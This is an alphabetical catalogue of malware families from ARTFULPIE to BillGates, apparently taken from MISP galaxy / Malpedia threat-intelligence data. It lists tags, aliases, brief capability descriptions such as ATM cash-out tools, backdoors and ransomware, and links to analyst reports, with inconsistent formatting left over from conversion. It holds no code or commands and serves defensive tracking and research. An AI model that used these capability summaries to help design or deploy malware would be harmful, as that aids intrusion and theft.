The tag is: misp-galaxy:malpedia="ARTFULPIE"

ARTFULPIE is also known as:

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<td><a href="https://www.us-cert.gov/ncas/analysis-reports/ar20-045e">https://www.us-cert.gov/ncas/analysis-reports/ar20-045e</a></td>
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Artra Downloader

The tag is: misp-galaxy:malpedia="Artra Downloader"

Artra Downloader is also known as:

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AscentLoader

The tag is: `misp-galaxy:malpedia="AscentLoader"`

AscentLoader is also known as:

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ASPC

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ASPC is also known as:

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Asprox

The tag is: `misp-galaxy:malpedia="Asprox"`

Asprox is also known as:

- Aseljo
- BadSrc

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Asruex

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Astaroth

The tag is: misp-galaxy:malpedia="Astaroth"

Astaroth is also known as:

- Guildma

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<td><a href="https://www.microsoft.com/security/blog/2020/03/23/latest-astaroth-living-off-the-land-attacks-are-even-more-invisible-but-not-less-observable/">https://www.microsoft.com/security/blog/2020/03/23/latest-astaroth-living-off-the-land-attacks-are-even-more-invisible-but-not-less-observable/</a></td>
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<td><a href="https://blog.easysol.net/meet-lucifer-international-trojan/">https://blog.easysol.net/meet-lucifer-international-trojan/</a></td>
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<td><a href="https://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/">https://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/</a></td>
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<td><a href="https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research">https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research</a></td>
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AsyncRAT

The tag is: misp-galaxy:malpedia="AsyncRAT"

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<td><a href="https://securelist.com/apt-trends-report-q3-2020/99204/">https://securelist.com/apt-trends-report-q3-2020/99204/</a></td>
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<td><a href="https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/">https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/</a></td>
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<td><a href="https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/">https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/</a></td>
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AthenaGo RAT

The tag is: misp-galaxy:malpedia="AthenaGo RAT"

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ATI-Agent

The tag is: misp-galaxy:malpedia="ATI-Agent"

ATI-Agent is also known as:

Table 1358. Table References

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<td><a href="https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/">https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/</a></td>
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ATMii

The tag is: misp-galaxy:malpedia="ATMii"

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ATMitch

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Atmosphere

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ATMSpitter

The ATMSpitter family consists of command-line tools designed to control the cash dispenser of an ATM through function calls to either CSCWCNG.dll or MFSXFS.dll. Both libraries are legitimate Windows drivers used to interact with the components of different ATM models.
The tag is: misp-galaxy:malpedia="ATMSpitter"

ATMSpitter is also known as:

Table 1362. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.atmspitter">https://malpedia.caad.fkie.fraunhofer.de/details/win.atmspitter</a></td>
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<td><a href="http://www.secureworks.com/research/threat-profiles/gold-kingswood">http://www.secureworks.com/research/threat-profiles/gold-kingswood</a></td>
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<td><a href="https://quoscient.io/reports/QuoINT_INTBRI_ATMSpitter_v2.pdf">https://quoscient.io/reports/QuoINT_INTBRI_ATMSpitter_v2.pdf</a></td>
</tr>
</tbody>
</table>

**Attor**

Attor is a cyberespionage platform used in targeted attacks against diplomatic missions and governmental institutions since at least 2013. Its most interesting features are a complex modular architecture, elaborate network communications, and a unique plugin to fingerprint GSM/GPRS devices.

Attor’s core lies in its dispatcher, which serves as a management unit for additional plugins which provide all of malware’s key capabilities. This allows the attackers to customize the platform on a per-victim basis. Plugins themselves are heavily synchronized. Network communication is based on Tor, aiming for anonymity and untraceability.

The most notable plugin can detect connected GSM/GPRS modems or mobile devices. Attor speaks to them directly using the AT command set, in order to collect sensitive information such as the IMEI, IMSI or MSISDN numbers, possibly identifying both the device and its subscriber. Other plugins provide persistence, an exfiltration channel, C&C communication and several further spying capabilities. The plugin responsible for capturing victim’s screen targets social networks and blogging platforms, email services, office software, archiving utilities, file sharing and messaging services.

The tag is: misp-galaxy:malpedia="Attor"

Attor is also known as:

Table 1363. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.attor">https://malpedia.caad.fkie.fraunhofer.de/details/win.attor</a></td>
</tr>
<tr>
<td><a href="https://www.welivesecurity.com/2019/10/10/eset-discovers-attor-spy-platform">https://www.welivesecurity.com/2019/10/10/eset-discovers-attor-spy-platform</a></td>
</tr>
<tr>
<td><a href="https://threatpost.com/sophisticated-spy-kit">https://threatpost.com/sophisticated-spy-kit</a> russians-gsm-plugin/149095/</td>
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August Stealer

The tag is: `misp-galaxy:malpedia="August Stealer"`

August Stealer is also known as:

Table 1364. Table References

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<td><a href="https://hazmalware.blogspot.de/2016/12/analysis-of-august-stealer-malware.html">https://hazmalware.blogspot.de/2016/12/analysis-of-august-stealer-malware.html</a></td>
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Auriga

The tag is: `misp-galaxy:malpedia="Auriga"`

Auriga is also known as:

- Riodrv

Table 1365. Table References

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Aurora

Ransomware

The tag is: `misp-galaxy:malpedia="Aurora"`

Aurora is also known as:

- OneKeyLocker

Table 1366. Table References

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Avaddon Ransomware

Avaddon is a ransomware malware targeting Windows systems often spread via malicious spam. The first known attack where Avaddon ransomware was distributed was in February 2020. Avaddon encrypts files using the extension .avdn and uses a TOR payment site for the ransom payment.

The tag is: `misp-galaxy:malpedia="Avaddon Ransomware"`

Avaddon Ransomware is also known as:

*Table 1367. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.avaddon">https://malpedia.caad.fkie.fraunhofer.de/details/win.avaddon</a></td>
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<td><a href="https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/">https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/</a></td>
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<td><a href="https://twitter.com/Securityinbits/status/1271065316903120902">https://twitter.com/Securityinbits/status/1271065316903120902</a></td>
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<td><a href="https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1">https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1</a></td>
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<td><a href="https://awakesecurity.com/blog/threat-hunting-for-avaddon-ransomware/">https://awakesecurity.com/blog/threat-hunting-for-avaddon-ransomware/</a></td>
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<td><a href="https://www.swascan.com/it/avaddon-ransomware/">https://www.swascan.com/it/avaddon-ransomware/</a></td>
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AvastDisabler

The tag is: misp-galaxy:malpedia="AvastDisabler"

AvastDisabler is also known as:

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<td><a href="https://securityintelligence.com/exposing-av-disabling-drivers-just-in-time-for-lunch/">https://securityintelligence.com/exposing-av-disabling-drivers-just-in-time-for-lunch/</a></td>
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AVCrypt

The tag is: misp-galaxy:malpedia="AVCrypt"

AVCrypt is also known as:

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Aveo

The tag is: misp-galaxy:malpedia="Aveo"

Aveo is also known as:

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<td><a href="https://www.secureworks.com/research/threat-profiles/brass-overbrook">https://www.secureworks.com/research/threat-profiles/brass-overbrook</a></td>
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Ave Maria

Information stealer which uses AutoIT for wrapping.

The tag is: misp-galaxy:malpedia="Ave Maria"

Ave Maria is also known as:

- AVE_MARIA
- AveMariaRAT
- Warzone RAT
- avemaria

Table 1371. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria">https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria</a></td>
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<td><a href="https://securelist.com/apt-trends-report-q3-2020/99204/">https://securelist.com/apt-trends-report-q3-2020/99204/</a></td>
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<td><a href="https://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1">https://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1</a></td>
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<td><a href="https://reaqta.com/2019/04/ave_maria-malware-part1/">https://reaqta.com/2019/04/ave_maria-malware-part1/</a></td>
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<td><a href="https://blog.yoroi.company/research/the-ave_maria-malware/">https://blog.yoroi.company/research/the-ave_maria-malware/</a></td>
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<td><a href="https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/">https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/</a></td>
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<td><a href="https://mp.weixin.qq.com/s/fsesosMnKIfAi_I9I0wKSA">https://mp.weixin.qq.com/s/fsesosMnKIfAi_I9I0wKSA</a></td>
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Avzhan

The tag is: misp-galaxy:malpedia="Avzhan"

Avzhan is also known as:

Table 1372. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.avzhan">https://malpedia.caad.fkie.fraunhofer.de/details/win.avzhan</a></td>
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Ayegent

The tag is: misp-galaxy:malpedia="Ayegent"

Ayegent is also known as:

Table 1373. Table References

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Azorult

AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.

The tag is: misp-galaxy:malpedia="Azorult"

Azorult is also known as:

- PuffStealer
- Rultazo

Table 1374. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult">https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult</a></td>
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<td><a href="https://blog.team-cymru.com/2020/02/19/azorult-what-we-see-using-our-own-tools/">https://blog.team-cymru.com/2020/02/19/azorult-what-we-see-using-our-own-tools/</a></td>
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<td><a href="https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/">https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/</a></td>
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<td><a href="https://isc.sans.edu/diary/25120">https://isc.sans.edu/diary/25120</a></td>
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<td><a href="https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html">https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html</a></td>
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<td><a href="https://twitter.com/DrStache_/status/1227662001247268864">https://twitter.com/DrStache_/status/1227662001247268864</a></td>
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<td><a href="https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/">https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/</a></td>
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<td><a href="https://research.checkpoint.com/the-emergence-of-the-new-azorult-3-3/">https://research.checkpoint.com/the-emergence-of-the-new-azorult-3-3/</a></td>
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The tag is: misp-galaxy:malpedia="Babar"

Babar is also known as:

• SNOWBALL

Table 1375. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.babar

http://www.spiegel.de/media/media-35683.pdf


https://drive.google.com/a/cyphort.com/file/d/0B9Mrr-en8FX4dzJqLWhDblhseTA/


https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope
**Babuk Ransomware**

The tag is: *misp-galaxy:malpedia=“Babuk Ransomware”*

Babuk Ransomware is also known as:

- Babyk Ransomware
- Vasa Locker

Table 1376. Table References

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<tr>
<td><a href="https://sebdraven.medium.com/babuk-is-distributed-packed-78e2f5dd2e62">https://sebdraven.medium.com/babuk-is-distributed-packed-78e2f5dd2e62</a></td>
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<td><a href="http://chuongdong.com/reverse%20engineering/2021/01/03/BabukRansomware/">http://chuongdong.com/reverse%20engineering/2021/01/03/BabukRansomware/</a></td>
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**BabyLon RAT**

The tag is: *misp-galaxy:malpedia=“BabyLon RAT”*

BabyLon RAT is also known as:

Table 1377. Table References

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</table>

**BABYMETAL**

BABYMETAL is a command line network tunnel utility based on the TinyMet Meterpreter tool, primarily used to execute Meterpreter reverse shell payloads.

The tag is: *misp-galaxy:malpedia=“BABYMETAL”*

BABYMETAL is also known as:

Table 1378. Table References
BabyShark

BabyShark is Microsoft Visual Basic (VB) script-based malware family first seen in November 2018. The malware is launched by executing the first stage HTA from a remote location, thus it can be delivered via different file types including PE files as well as malicious documents. It exfiltrates system information to C2 server, maintains persistence on the system, and waits for further instruction from the operator.

The tag is: *misp-galaxy:malpedia="BabyShark"*

BabyShark is also known as:

Table 1379. Table References

Links

| https://malpedia.caad.fkie.fraunhofer.de/details/win.babymetal |
| https://www.infosecurityeurope.com/novadocuments/367989?v=636338290033030000 |

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| https://malpedia.caad.fkie.fraunhofer.de/details/win.babyshark |
| https://blog.alyac.co.kr/3352 |
| https://us-cert.cisa.gov/ncas/alerts/aa20-301a |
| https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/ |
| https://twitter.com/i/web/status/1099147896950185985 |
BACKBEND

FireEye describes BACKBEND as a secondary downloader used as a backup mechanism in the case the primary backdoor is removed. When executed, BACKBEND checks for the presence of the mutexes MicrosoftZj or MicrosoftZjBak (both associated with BACKSPACE variants). If either of the mutexes exist, the malware exits.

The tag is: misp-galaxy:malpedia="BACKBEND"

BACKBEND is also known as:

**Table 1380. Table References**

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<td><a href="https://www2.fireeye.com/rs/fireeye/images/rpt-apt30.pdf">https://www2.fireeye.com/rs/fireeye/images/rpt-apt30.pdf</a></td>
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BackNet

The tag is: misp-galaxy:malpedia="BackNet"

BackNet is also known as:

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<tr>
<td><a href="https://github.com/valsov/BackNet">https://github.com/valsov/BackNet</a></td>
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Backoff POS

The tag is: misp-galaxy:malpedia="Backoff POS"

Backoff POS is also known as:

**Table 1382. Table References**

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.backoff">https://malpedia.caad.fkie.fraunhofer.de/details/win.backoff</a></td>
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<td><a href="https://securelist.com/sinkholing-the-backoff-pos-trojan/66305/">https://securelist.com/sinkholing-the-backoff-pos-trojan/66305/</a></td>
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backspace

The tag is: misp-galaxy:malpedia="backspace"

backspace is also known as:

- Lecna
Table 1383. Table References

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<td><a href="https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf">https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf</a></td>
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**BackSwap**

The tag is: `misp-galaxy:malpedia=“BackSwap”`

BackSwap is also known as:

Table 1384. Table References

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<td><a href="https://www.f5.com/labs/articles/threat-intelligence/backswap-defrauds-online-banking-customers-using-hidden-input-fi">https://www.f5.com/labs/articles/threat-intelligence/backswap-defrauds-online-banking-customers-using-hidden-input-fi</a></td>
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<td><a href="https://research.checkpoint.com/the-evolution-of-backswap/">https://research.checkpoint.com/the-evolution-of-backswap/</a></td>
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**BADCALL (Windows)**

The tag is: `misp-galaxy:malpedia=“BADCALL (Windows)”`

BADCALL (Windows) is also known as:

Table 1385. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.badcall">https://malpedia.caad.fkie.fraunhofer.de/details/win.badcall</a></td>
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<td><a href="https://www.us-cert.gov/ncas/analysis-reports/ar19-252a">https://www.us-cert.gov/ncas/analysis-reports/ar19-252a</a></td>
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BadEncript

The tag is: $\textit{misp-galaxy:malpedia=\textquote{BadEncript}}$

BadEncript is also known as:

$\textit{Table 1386. Table References}$

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<td><a href="https://twitter.com/PhysicalDrive0/status/833067081981710336">https://twitter.com/PhysicalDrive0/status/833067081981710336</a></td>
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badflick

BADFLICK, a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command-and-control configuration.

The tag is: $\textit{misp-galaxy:malpedia=\textquote{badflick}}$

badflick is also known as:

$\textit{Table 1387. Table References}$

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<td><a href="https://blog.amossys.fr/badflick-is-not-so-bad.html">https://blog.amossys.fr/badflick-is-not-so-bad.html</a></td>
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BadNews

The tag is: $\textit{misp-galaxy:malpedia=\textquote{BadNews}}$

BadNews is also known as:

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Bagle

The tag is: misp-galaxy:malpedia="Bagle"

Bagle is also known as:

Table 1389. Table References

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https://malpedia.caad.fkie.fraunhofer.de/details/win.bagle

Bahamut (Windows)

The tag is: misp-galaxy:malpedia="Bahamut (Windows)"

Bahamut (Windows) is also known as:

Table 1390. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bahamut


Baldr

The tag is: misp-galaxy:malpedia="Baldr"

Baldr is also known as:
Balkir

Table 1391. Table References

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<td><a href="https://www.youtube.com/watch?v=E2V4kB_gtcQ">https://www.youtube.com/watch?v=E2V4kB_gtcQ</a></td>
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**BalkanDoor**

According to ESET, BalkanDoor is a simple backdoor with a small number of commands (download and execute a file, create a remote shell, take a screenshot). It can be used to automate tasks on the compromised computer or to automatically control several affected computers at once. We have seen six versions of the backdoor, with a range of supported commands, evolve since 2016.

The tag is: *misp-galaxy:malpedia="BalkanDoor"

BalkanDoor is also known as:

Table 1392. Table References

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<td><a href="https://www.welivesecurity.com/2019/08/14/balkans-businesses-double-barreled-weapon/">https://www.welivesecurity.com/2019/08/14/balkans-businesses-double-barreled-weapon/</a></td>
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**BalkanRAT**

The goal of BalkanRAT which is a more complex part of the malicious Balkan-toolset (cf. BalkanDoor) is to deploy and leverage legitimate commercial software for remote administration. The malware has several additional components to help load, install and conceal the existence of the remote desktop software. A single long-term campaign involving BalkanRAT has been active at least from January 2016 and targeted accounting departments of organizations in Croatia, Serbia, Montenegro, and Bosnia and Herzegovina (considered that the contents of the emails, included links and decoy PDFs all were involving taxes). It was legitimate signed and installed by an exploit of the WinRAR ACE vulnerability (CVE-2018-20250).

The tag is: *misp-galaxy:malpedia="BalkanRAT"

BalkanRAT is also known as:

Table 1393. Table References

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Bamital

The tag is: `misp-galaxy:malpedia="Bamital"`

Bamital is also known as:

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<td><a href="https://blogs.microsoft.com/blog/2013/02/22/bamital-botnet-takedown-is-successful-cleanup-underway/">https://blogs.microsoft.com/blog/2013/02/22/bamital-botnet-takedown-is-successful-cleanup-underway/</a></td>
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Banatrix

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Banatrix is also known as:

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bancos

The tag is: `misp-galaxy:malpedia="bancos"`

bancos is also known as:

Table 1396. Table References

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Bandook

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Bandook is also known as:
• Bandok

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<td><a href="https://research.checkpoint.com/2020/bandook-signed-delivered/">https://research.checkpoint.com/2020/bandook-signed-delivered/</a></td>
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<tr>
<td><a href="https://www.eff.org/deeplinks/2020/12/dark-caracal-you-missed-spot">https://www.eff.org/deeplinks/2020/12/dark-caracal-you-missed-spot</a></td>
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<td><a href="https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf">https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf</a></td>
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**bangat**

The tag is: *misp-galaxy:malpedia=*bangat*

bangat is also known as:

*Table 1398. Table References*

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<td><a href="https://www.slideshare.net/YuryChemerkin/appendix-c-digital-the-malware-arsenal">https://www.slideshare.net/YuryChemerkin/appendix-c-digital-the-malware-arsenal</a></td>
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**Banjori**

The tag is: *misp-galaxy:malpedia=*Banjori*

Banjori is also known as:

• BackPatcher
• BankPatch
• MultiBanker 2

*Table 1399. Table References*

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<td><a href="http://blog.kleissner.org/?p=69">http://blog.kleissner.org/?p=69</a></td>
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<td><a href="http://osint.bambenekconsulting.com/feeds/">http://osint.bambenekconsulting.com/feeds/</a></td>
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<td><a href="https://www.johannesbader.ch/2015/02/the-dga-of-banjori/">https://www.johannesbader.ch/2015/02/the-dga-of-banjori/</a></td>
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<td><a href="http://blog.kleissner.org/?p=192">http://blog.kleissner.org/?p=192</a></td>
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**Bankshot**

The tag is: `misp-galaxy:malpedia="Bankshot"`

Bankshot is also known as:

- COPPERHEDGE

*Table 1400. Table References*

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<td><a href="https://www.secureworks.com/research/threat-profiles/nickel-gladstone">https://www.secureworks.com/research/threat-profiles/nickel-gladstone</a></td>
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<td><a href="https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF">https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF</a></td>
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<td><a href="https://www.us-cert.gov/ncas/analysis-reports/ar20-133a">https://www.us-cert.gov/ncas/analysis-reports/ar20-133a</a></td>
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<td><a href="https://blog.reversinglabs.com/blog/hidden-cobra">https://blog.reversinglabs.com/blog/hidden-cobra</a></td>
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**barkiofork**

The tag is: `misp-galaxy:malpedia="barkiofork"`

barkiofork is also known as:

*Table 1401. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.barkiofork">https://malpedia.caad.fkie.fraunhofer.de/details/win.barkiofork</a></td>
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<tr>
<td><a href="https://www.symantec.com/connect/blogs/backdoorbarkiofork-targets-aerospace-and-defense-industry">https://www.symantec.com/connect/blogs/backdoorbarkiofork-targets-aerospace-and-defense-industry</a></td>
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**Bart**

The tag is: `misp-galaxy:malpedia="Bart"`

Bart is also known as:

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BatchWiper

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<td><a href="http://contagiodump.blogspot.com/2012/12/batchwiper-samples.html">http://contagiodump.blogspot.com/2012/12/batchwiper-samples.html</a></td>
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Batel

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BazarBackdoor

BazarBackdoor is a small backdoor, probably by a TrickBot "spin-off" like anchor. Its called team9 backdoor (and the corresponding loader: team9 restart loader).

For now, it exclusively uses Emercoin domains (.bazar), thus the naming. FireEye uses KEGTAP as name for BazarLoader and BEERBOT for BazarBackdoor.

The tag is: misp-galaxy:malpedia="BazarBackdoor"

BazarBackdoor is also known as:

- BEERBOT
- BazarCall
- KEGTAP
- Team9Backdoor
- bazaloder

<p>| Table 1405. Table References |</p>
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<td><a href="https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv">https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv</a></td>
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<tr>
<td><a href="https://cofense.com/blog/bazarbackdoor-stealthy-infiltration">https://cofense.com/blog/bazarbackdoor-stealthy-infiltration</a></td>
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<td><a href="https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/">https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/</a></td>
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<td><a href="https://www.proofpoint.com/us/blog/threat-insight/baza-valentines-day">https://www.proofpoint.com/us/blog/threat-insight/baza-valentines-day</a></td>
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<td><a href="https://blog.fox-it.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/">https://blog.fox-it.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/</a></td>
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<td><a href="https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e">https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e</a></td>
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<td><a href="https://thedfirreport.com/2021/01/31/bazar-no-ryuk/">https://thedfirreport.com/2021/01/31/bazar-no-ryuk/</a></td>
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<td><a href="https://johannesbader.ch/blog/the-dga-of-bazarbackdoor/">https://johannesbader.ch/blog/the-dga-of-bazarbackdoor/</a></td>
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<td><a href="https://www.area1security.com/blog/trickbot-spear-phishing-drops-bazar-buer-malware/">https://www.area1security.com/blog/trickbot-spear-phishing-drops-bazar-buer-malware/</a></td>
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<td><a href="https://www.crowdstrike.com/blog/wizard-spider-adversary-update/">https://www.crowdstrike.com/blog/wizard-spider-adversary-update/</a></td>
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<td><a href="https://unit42.paloaltonetworks.com/ryuk-ransomware/">https://unit42.paloaltonetworks.com/ryuk-ransomware/</a></td>
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<td><a href="https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware">https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware</a></td>
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<td><a href="https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf">https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf</a></td>
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<td><a href="https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/">https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/</a></td>
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<td><a href="https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/">https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/</a></td>
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BazarNimrod

A rewrite of Bazarloader in the Nim programming language.
The tag is: misp-galaxy:malpedia="BazarNimrod"

BazarNimrod is also known as:

Table 1406. Table References

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<td><a href="https://twitter.com/James_inthe_box/status/1357009652857196546">https://twitter.com/James_inthe_box/status/1357009652857196546</a></td>
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<td><a href="https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e">https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e</a></td>
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**BBSRAT**

The tag is: misp-galaxy:malpedia="BBSRAT"

BBSRAT is also known as:

Table 1407. Table References

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**BBtok**

360 Security Center describes BBtok as a banking trojan targeting Mexico.

The tag is: misp-galaxy:malpedia="BBtok"

BBtok is also known as:

Table 1408. Table References

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Beapy

The tag is: `misp-galaxy:malpedia="Beapy"`

Beapy is also known as:

*Table 1409. Table References*

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Bedep

The tag is: `misp-galaxy:malpedia="Bedep"`

Bedep is also known as:

*Table 1410. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.bedep">https://malpedia.caad.fkie.fraunhofer.de/details/win.bedep</a></td>
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Bee

Malware family observed in conjunction with PlugX infrastructure in 2013.

The tag is: `misp-galaxy:malpedia="Bee"`

Bee is also known as:

*Table 1411. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.bee">https://malpedia.caad.fkie.fraunhofer.de/details/win.bee</a></td>
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<tr>
<td><a href="https://www.virustotal.com/gui/file/38f9ce7243c7851d67b24eb53b16177147f38dfff201c5bedefe260d22ac908/detection">https://www.virustotal.com/gui/file/38f9ce7243c7851d67b24eb53b16177147f38dfff201c5bedefe260d22ac908/detection</a></td>
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beendoor

BEENDOOR is a XMPP based trojan. It is capable of taking screenshots of the victim’s desktop.

The tag is: `misp-galaxy:malpedia="beendoor"`

beendoor is also known as:

*Table 1412. Table References*

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BeepService

The tag is: `misp-galaxy:malpedia="BeepService"`

BeepService is also known as:

Table 1413. Table References

Links

- https://malpedia.caad.fkie.fraunhofer.de/details/win.beepservice
- https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators

Belonard

Once set up in the system, Trojan.Belonard replaces the list of available game servers in the game client and creates proxies on the infected computer to spread the Trojan. As a rule, proxy servers show a lower ping, so other players will see them at the top of the list. By selecting one of them, a player gets redirected to a malicious server where their computer become infected with Trojan.Belonard.

The tag is: `misp-galaxy:malpedia="Belonard"`

Belonard is also known as:

Table 1414. Table References

Links

- https://malpedia.caad.fkie.fraunhofer.de/details/win.belonard
- https://news.drweb.com/show/?i=13135&c=23&lng=en&p=0

Berbomthum

The tag is: `misp-galaxy:malpedia="Berbomthum"`

Berbomthum is also known as:

Table 1415. Table References

Links

- https://malpedia.caad.fkie.fraunhofer.de/details/win.berbomthum
BernhardPOS

The tag is: misp-galaxy:malpedia="BernhardPOS"

BernhardPOS is also known as:

Table 1416. Table References

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<td><a href="https://securitykitten.github.io/2015/07/14/bernhardpos.html">https://securitykitten.github.io/2015/07/14/bernhardpos.html</a></td>
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BestKorea

The tag is: misp-galaxy:malpedia="BestKorea"

BestKorea is also known as:

Table 1417. Table References

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<tr>
<td><a href="https://github.com/Jacquais/BestKorea">https://github.com/Jacquais/BestKorea</a></td>
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BetaBot

The tag is: misp-galaxy:malpedia="BetaBot"

BetaBot is also known as:

- Neurevt

Table 1418. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.betabot">https://malpedia.caad.fkie.fraunhofer.de/details/win.betabot</a></td>
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<tr>
<td><a href="https://www.cybereason.com/blog/betabot-banking-trojan-neurevt">https://www.cybereason.com/blog/betabot-banking-trojan-neurevt</a></td>
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<tr>
<td><a href="http://www.xylibox.com/2015/04/betabot-retrospective.html">http://www.xylibox.com/2015/04/betabot-retrospective.html</a></td>
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<tr>
<td><a href="https://news.sophos.com/en-us/2020/05/14/raticate/">https://news.sophos.com/en-us/2020/05/14/raticate/</a></td>
</tr>
<tr>
<td><a href="http://resources.infosecinstitute.com/beta-bot-analysis-part-1/#gref">http://resources.infosecinstitute.com/beta-bot-analysis-part-1/#gref</a></td>
</tr>
</tbody>
</table>
Bezigate

Bezigate is a Trojan horse that opens a back door on the compromised computer. It may also download potentially malicious files.

The Trojan may perform the following actions:
- List, move, and delete drives
- List, move, and delete files
- List processes and running Windows titles
- List services
- List registry values
- Kill processes
- Maximize, minimize, and close windows
- Upload and download files
- Execute shell commands
- Uninstall itself

The tag is: misp-galaxy:malpedia="Bezigate"

Bezigate is also known as:

Table 1419. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.bezigate">https://malpedia.caad.fkie.fraunhofer.de/details/win.bezigate</a></td>
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BfBot

The tag is: misp-galaxy:malpedia="BfBot"

BfBot is also known as:

Table 1420. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win">https://malpedia.caad.fkie.fraunhofer.de/details/win</a> bfbot</td>
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</table>

BI_D Ransomware

Small and relatively simple ransomware for Windows. Gives files the .BI_D extension after encrypting them with a combination of RSA/AES. Persistence achieved via the Windows Registry. Kills all processes on the victim machine besides itself and a small whitelist of mostly Windows system processes and kills shadow copies.

The tag is: misp-galaxy:malpedia="BI_D Ransomware"

BI_D Ransomware is also known as:

Table 1421. Table References
bifrose

The tag is: misp-galaxy:malpedia="bifrose"

bifrose is also known as:

Table 1422. Table References

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<td><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/bifrose-now-more-evasive-through-tor-used-for-targeted-attack/">https://blog.trendmicro.com/trendlabs-security-intelligence/bifrose-now-more-evasive-through-tor-used-for-targeted-attack/</a></td>
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</table>

BillGates

BillGates is a modularized malware, of supposedly Chinese origin. Its main functionality is to perform DDoS attacks, with support for DNS amplification. Often, BillGates is delivered with one or many backdoor modules.

BillGates is available for *nix-based systems as well as for Windows.

On Windows, the (Bill)Gates installer typically contains the various modules as linked resources.

The tag is: misp-galaxy:malpedia="BillGates"

BillGates is also known as:

Table 1423. Table References

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<tr>
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<td><a href="https://securelist.com/versatile-ddos-trojan-for-linux/64361/">https://securelist.com/versatile-ddos-trojan-for-linux/64361/</a></td>
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<td><a href="https://bartblaze.blogspot.com/2017/12/notes-on-linuxbillgates.html">https://bartblaze.blogspot.com/2017/12/notes-on-linuxbillgates.html</a></td>
